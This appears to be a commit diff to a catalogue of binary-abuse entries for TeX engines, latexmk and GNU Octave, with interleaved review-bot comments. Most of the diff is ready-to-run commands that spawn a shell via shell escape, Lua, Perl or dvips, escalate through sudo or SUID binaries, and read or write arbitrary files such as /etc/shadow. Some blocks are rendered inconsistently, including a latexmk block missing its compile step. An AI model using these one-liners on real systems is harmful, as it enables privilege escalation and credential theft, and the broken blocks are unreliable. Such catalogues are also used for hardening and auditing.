Fix and improve TeX binaries and GNU Octave
This commit is contained in:
parent
806c8054eb
commit
21b641911e
@ -1,8 +1,16 @@
|
|||||||
|
---
|
||||||
|
description: The `texput.dvi` output file produced by `tex` can be created offline and uploaded to the target.
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
tex '\special{psfile="`/bin/sh 1>&0"}\end'
|
||||||
|
dvips -R0 texput.dvi
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document}" > file.tex
|
tex '\special{psfile="`/bin/sh 1>&0"}\end'
|
||||||
echo '$$\hbox to5cm{\vbox to5cm{\vfil\special{psfile="`PROGRAM > /tmp/result"}}\hfill}$$' >> file.tex
|
sudo dvips -R0 texput.dvi
|
||||||
echo "\end{document}" >> file.tex
|
limited-suid:
|
||||||
tex -interaction=nonstopmode file.tex && sudo dvips -R0 file.dvi
|
- code: |
|
||||||
cat /tmp/result
|
tex '\special{psfile="`/bin/sh 1>&0"}\end'
|
||||||
|
./dvips -R0 texput.dvi
|
||||||
|
---
|
||||||
|
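Review bot: The description on L18 explains that `texput.dvi` can be produced offline, but it leaves out the precondition every code block depends on: `dvips` is invoked with `-R0` (L39, L59, L78), which turns off its secure mode, and it is that mode that otherwise refuses the backtick form of `\special{psfile=...}`. Stating the condition in the description makes the entry's applicability clear and tells an administrator what to look for in a sudo rule or wrapper, e.g. `description: The \`texput.dvi\` output file produced by \`tex\` can be created offline and uploaded to the target. Command execution requires \`dvips\` secure mode to be disabled (\`-R0\`).` Whether the `tex` invocations on old L35/L54 were meant to survive on the new side cannot be recovered from the rendered layout.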
@ -1,11 +1,21 @@
|
|||||||
description: `latex` is a symbolic link to [`pdftex`](/gtfobins/pdftex/). However the program does not have the same behaviour regarding the name of argv[0]. This is the same behaviour for [`xetex`](/gtfobins/xetex/)/[`xelatex`](/gtfobins/xelatex/).
|
---
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- description: The read file will be part of the output.
|
||||||
echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
|
code: |
|
||||||
latex read.tex
|
latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||||
strings read.dvi
|
strings article.dvi
|
||||||
sudo:
|
sudo:
|
||||||
|
- description: The read file will be part of the output.
|
||||||
|
code: |
|
||||||
|
sudo latex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||||
|
strings article.dvi
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
|
sudo latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
sudo latex -shell-escape file.tex
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
./latex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
|
---
|
||||||
|
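Review bot: The new side of the latex entry appears to begin at `---` (L91) with the old description on L89 removed and nothing put in its place, so the file no longer says what the functions rely on. The code itself shows the split: the shell and sudo-shell commands pass `--shell-escape` (L108, L164, L177) while the file-read commands (L128, L150) do not, because `\verbatiminput` is plain TeX. A one-line replacement such as `description: The shell functions rely on \`--shell-escape\`, which overrides the \`shell_escape\` default from \`texmf.cnf\`; the file-read functions need no shell escape.` would keep that context and the corresponding mitigation boundary visible. The same description removal appears in the pdflatex (L436), xelatex (L651), pdftex (L535) and tex (L593) sections.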
@ -1,11 +1,14 @@
|
|||||||
description: `latexmk` is a perl script.
|
description: This allows to execute [`perl`](/gtfobins/perl/) code.
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: latexmk -e 'exec "/bin/sh";'
|
||||||
|
- code: latexmk -latex='/bin/sh #' /dev/null
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- code: latexmk -e 'open(X,"/etc/passwd");while(<X>){print $_;}exit'
|
||||||
echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
|
- description: The read file will be part of the output.
|
||||||
latexmk read.tex
|
code: |
|
||||||
strings read.dvi
|
TF=$(mktemp)
|
||||||
|
echo '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}' >$TF
|
||||||
|
strings tmp.dvi
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: sudo latexmk -e 'exec "/bin/sh";'
|
||||||
echo "PROGRAM > /tmp/result.txt" > /tmp/run.sh
|
|
||||||
sudo latexmk -latex="/tmp/run.sh" file.tex
|
|
||||||
|
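Review bot: The new description on L190 drops the fact stated on old L188 that `latexmk` is a Perl script, which is exactly what explains why `-e` on L203, L217 and L250 evaluates Perl and why a sudo rule for `latexmk` is equivalent to one for `perl`; keeping both sentences reads `description: \`latexmk\` is a Perl script. This allows executing [\`perl\`](/gtfobins/perl/) code.` Separately, the file-read block assigns `TF=$(mktemp)` on L232 but redirects with an unquoted `>$TF` on L236; `>"$TF"` avoids word splitting when TMPDIR contains spaces. As rendered, the block also writes to `$TF` and then reads `tmp.dvi` (L240) with no `latexmk` invocation between them, so either a line was lost in the rendering or the names are inconsistent and should be checked against an actual run before merge.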
@ -1,6 +1,10 @@
|
|||||||
description: `lualatex` is a symbolic link to [`luatex`](/gtfobins/luatex/). However the program does not have the same behaviour regarding the name of argv[0]. It allows to call external command with \write18 but it also allows to call external [`lua`](/gtfobins/lua/) scripts.
|
---
|
||||||
|
description: This allows to execute [`lua`](/gtfobins/lua/) code.
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: sudo lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
|
||||||
echo "\documentclass[12pt]{article} \usepackage{shellesc} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
|
limited-suid:
|
||||||
sudo lualatex -shell-escape file.tex
|
- code: ./lualatex -shell-escape '\documentclass{article}\begin{document}\directlua{os.execute("/bin/sh")}\end{document}'
|
||||||
|
---
|
||||||
|
@ -1,7 +1,10 @@
|
|||||||
description: `luatex` allows to call external [`lua`](/gtfobins/lua/) scripts.
|
---
|
||||||
|
description: This allows to execute [`lua`](/gtfobins/lua/) code.
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: sudo luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
|
||||||
echo '\documentclass{article} \usepackage{luacode} \begin{document} \def\foo{\directlua{dofile("runfunc.lua")}} \foo \end{document}' > file.tex
|
limited-suid:
|
||||||
echo 'os.execute("/usr/bin/id")' > runfunc.lua
|
- code: ./luatex -shell-escape '\directlua{os.execute("/bin/sh")}\end'
|
||||||
luatex --interaction=nonstopmode --shell-escape file.tex
|
---
|
||||||
|
@ -1,10 +1,14 @@
|
|||||||
|
---
|
||||||
description: The payloads are compatible with GUI.
|
description: The payloads are compatible with GUI.
|
||||||
functions:
|
functions:
|
||||||
shell:
|
shell:
|
||||||
- code: octave-cli --eval "system('/bin/sh')"
|
- code: octave-cli --eval 'system("/bin/sh")'
|
||||||
file-write:
|
file-write:
|
||||||
- code: poctave-cli --eval 'filename = "file_to_write"; fid = fopen (filename, "w"); fputs (fid, "DATA"); fclose (fid);'
|
- code: octave-cli --eval 'filename = "file_to_write"; fid = fopen(filename, "w"); fputs(fid, "DATA"); fclose(fid);'
|
||||||
file-read:
|
file-read:
|
||||||
- code: octave-cli --eval 'fid = fopen ("/etc/passwd"); while(!feof(fid)); txt = fgetl(fid), txt; endwhile; fclose (fid);'
|
- code: octave-cli --eval 'format none; fid = fopen("file_to_read"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo octave-cli --eval "system('/bin/sh')"
|
- code: sudo octave-cli --eval 'system("/bin/sh")'
|
||||||
|
limited-suid:
|
||||||
|
- code: ./octave-cli --eval 'system("/bin/sh")'
|
||||||
|
---
|
||||||
|
@ -1,11 +1,21 @@
|
|||||||
description: `pdflatex` is a symbolic link to [`pdftex`](/gtfobins/pdftex/). However the program does not have the same behaviour regarding the name of argv[0]. This is the same behaviour for [`xetex`](/gtfobins/xetex/)/[`xelatex`](/gtfobins/xelatex/).
|
---
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- description: The read file will be part of the output.
|
||||||
echo "\documentclass[12pt]{article} \usepackage{verbatim} \hfuzz=25.002pt \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
|
code: |
|
||||||
latex read.tex
|
pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||||
#/etc/shadow is in read.pdf
|
pdftotext article.pdf -
|
||||||
sudo:
|
sudo:
|
||||||
|
- description: The read file will be part of the output.
|
||||||
|
code: |
|
||||||
|
sudo pdflatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||||
|
pdftotext article.pdf -
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
|
sudo pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
sudo pdflatex -shell-escape file.tex
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
./pdflatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
|
---
|
||||||
|
@ -1,6 +1,12 @@
|
|||||||
description: `pdftex` has a similar behaviour as [`tex`](/gtfobins/tex/)
|
---
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
pdftex --shell-escape '\write18{/bin/sh}\end'
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
|
sudo pdftex --shell-escape '\write18{/bin/sh}\end'
|
||||||
pdftex -interaction=nonstopmode --shell-escape file.tex
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
./pdftex --shell-escape '\write18{/bin/sh}\end'
|
||||||
|
---
|
||||||
|
@ -1,6 +1,12 @@
|
|||||||
description: `tex` has a similar behaviour as [`pdftex`](/gtfobins/pdftex/)
|
---
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
tex --shell-escape '\write18{/bin/sh}\end'
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document} \write18{/usr/bin/id} \end{document}" > file.tex
|
sudo tex --shell-escape '\write18{/bin/sh}\end'
|
||||||
tex -interaction=nonstopmode --shell-escape file.tex
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
./tex --shell-escape '\write18{/bin/sh}\end'
|
||||||
|
---
|
||||||
|
@ -1,11 +1,21 @@
|
|||||||
description: `xelatex` is a symbolic link to [`xetex`](/gtfobins/xetex/). However the program does not have the same behaviour regarding the name of argv[0].
|
---
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
file-read:
|
file-read:
|
||||||
- code: |
|
- description: The read file will be part of the output.
|
||||||
echo "\documentclass[12pt]{article} \usepackage{verbatim} \begin{document} \verbatiminput{/etc/shadow} \end{document}" > read.tex
|
code: |
|
||||||
latexmk read.tex
|
xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||||
#/etc/shadow is in read.pdf
|
strings article.dvi
|
||||||
sudo:
|
sudo:
|
||||||
|
- description: The read file will be part of the output.
|
||||||
|
code: |
|
||||||
|
sudo xelatex '\documentclass{article}\usepackage{verbatim}\begin{document}\verbatiminput{file_to_read}\end{document}'
|
||||||
|
strings article.dvi
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
|
sudo xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
sudo xelatex -shell-escape file.tex
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
./xelatex --shell-escape '\documentclass{article}\begin{document}\immediate\write18{/bin/sh}\end{document}'
|
||||||
|
---
|
||||||
|
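Review bot: The file-read blocks on L695 and L716 inspect `article.dvi`, while the line they replace (old L693) and the parallel pdflatex section (L480, L501) treat the output as a PDF, so the two sections disagree about what `xelatex` produces. The old description on L651 records that `xelatex` is a link to `xetex`, whose default pipeline goes through xdvipdfmx and emits a PDF, which suggests the pdflatex form `pdftotext article.pdf -` is the one that should appear here. Either way the entry should be run once before merge rather than carried over by analogy with latex's `strings article.dvi` (L133, L154).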
@ -1,5 +1,12 @@
|
|||||||
|
---
|
||||||
functions:
|
functions:
|
||||||
|
shell:
|
||||||
|
- code: |
|
||||||
|
xetex --shell-escape '\write18{/bin/sh}\end'
|
||||||
sudo:
|
sudo:
|
||||||
- code: |
|
- code: |
|
||||||
echo "\documentclass[12pt]{article} \begin{document} \immediate\write18{/usr/bin/whoami} \end{document}" > file.tex
|
sudo xetex --shell-escape '\write18{/bin/sh}\end'
|
||||||
sudo xetex -interaction=nonstopmode -shell-escape file.tex
|
limited-suid:
|
||||||
|
- code: |
|
||||||
|
./xetex --shell-escape '\write18{/bin/sh}\end'
|
||||||
|
---
|
||||||
|